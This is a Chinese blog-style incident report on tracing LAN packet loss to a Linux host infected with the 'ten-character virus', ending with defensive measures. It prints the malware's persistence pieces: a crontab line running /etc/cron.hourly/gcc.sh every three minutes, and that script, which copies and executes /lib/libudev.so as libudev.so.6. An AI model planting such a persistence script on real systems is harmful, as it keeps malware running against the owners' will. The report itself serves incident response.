记一次Linux系统被入侵的过程
记一次Linux系统被入侵的过程
1. 前期现象
前期现象,宋组那边反应开发环境192.161.14.98这台机器通过公网下载文件,很慢,ping百度丢包严重。因为这台机器是通过楼下adsl拨号上网,于是连上去ping该网段网关(192.168.3.1),发现内网都丢包。
2.问题排查
2.1前期排查
2.1.1排查是不是14.98这台机器的问题
为排查是不是192.161.14.98这台机器的问题,通过发现抓包发现。Arp包、和广播包都比较比较多,考虑到是不是DOS攻击,然后在登录adsl开启ICMP泛洪、SYN泛洪、ARP攻击相关策略,重启adsl。在14.98这台机器上,ping 网关192.168.3.1,发现过一会儿丢包依然存在。为排除是不是14.98这台机器的问题,选择stage环境6.21这台机(该机器也是通过adsl上网的有一个192.168.3.0网段的IP)做测试,通过这台机器ping网关(192.168.3.1),发现丢包依然存在。
2.1.2排查可能不是14.98这台机器的问题
于是,就考虑到可能不是14.98这台机器的问题,考虑可能是通过adsl上网下载的机器占用带宽的问题(因为这个问题,在以前也遇到过,通过改内网网段,问题就解决了。)于是将192.168.3.0/24改成192.168.2.0/24,并修改了14.98和stage6.21这台机器的相应的能够上公网的ip。发现丢包现象停止。基本确认是有机器占用带宽导致这次问题。
2.2中期排查
为排除以后在出现此问题,影响工作。决定绑定主机mac地址,限制p2p流量,便于以后快速定位问题。
2.2.1开启dhcp服务器,定位通过adsl上网的主机都是哪些IP哪些mac地址,并配置mac过滤策略。如下图所示
2.2.2通过逐一排查定位主机
在切换策略的时候,定位到14.158这台机器有重大嫌疑。如果允许该主机上外网,丢包现象存在,如果限制该主机上网,丢包现象消失。
2.3后期排查
2.3.1通过抓包发现该主机arp包、广播包太多说明可能存在问题
2.3.2top命令查看异常进程
2.3.3查看该异常的连接
当时忘截图了,发现该进程的一个端口有一个法国IP连接存于established状态。
2.3.4查看该进程执行文件
2.3.4杀死该进程断网
发现该进程有死尔复生的功能,但是断网之后对网络带宽影响消失。断定可能本机有定时任务。
2.3.5排查定时任务
[root@www ~]# cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
*/3 * * * * root /etc/cron.hourly/gcc.sh
2.3.6定位循环执行的病毒体
[root@www ~]# cat /etc/cron.hourly/gcc.sh
#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6
通过百度查出此病毒为臭名昭著的“十字符病毒”
2.3.7十字符病毒详解及其处理办法
请参考下面链接http://blog.csdn.net/fgf00/article/details/51388422
2.3.8查看病毒体源码
3.追踪被黑的原因
3.1查看最近登录本台机器的未能看到近期成功登录本机的记录怀疑已被抹除痕迹
3.2怀疑当初官网测试的时候,由于root密码太弱被暴力破解,注入此病毒。
3.3具体原因还需进一步研究。
4.造成危害
占用系统资源和占用带宽,导致局域网丢包严重。
5.解决办法
5.1杀死病毒请参考如下链接
http://blog.csdn.net/fgf00/article/details/51388422
5.2防范措施
5.2.1禁用root直接登录
5.2.2设置登录错误次数限定
5.2.3安装prtg软件,监控异常流量,便于快速定位问题
最新文章
- js切换不同的div的颜色
- 【转载】ASP.NET MVC的过滤器
- 插值和空间分析(二)_变异函数分析(R语言)
- 关于Java中的选择排序法和冒泡排序法
- 《Linear Algebra and Its Applications》-chaper5-特征值与特征向量-基本概念
- 【转载】视频编码(H264概述)
- [置顶] Android4.x对长按电源键(挂断键)和短按电源键(挂断键)的详细处理流程
- python基础课程_学习笔记13:标准库:有些收藏夹——sys
- 201521123119《Java程序设计》第6周学习总结
- Oracle实战笔记(第四天)
- 现代 PHP 新特性 —— 内置的 HTTP 服务器 (转)
- 《Http权威指南》读书笔记
- 【HDU-6146】Pokémon GO(dp)
- Uva 11178 Morley定理
- 用R画韦恩图
- Luogu2661 信息传递(图论)
- tongjiword,write / read file demo
- OC Foundation框架—集合
- [Todo] Redis里面队列的两种模式,以及抢红包在Redis中的实现
- Intellij IDEA 配置Subversion插件实现步骤详解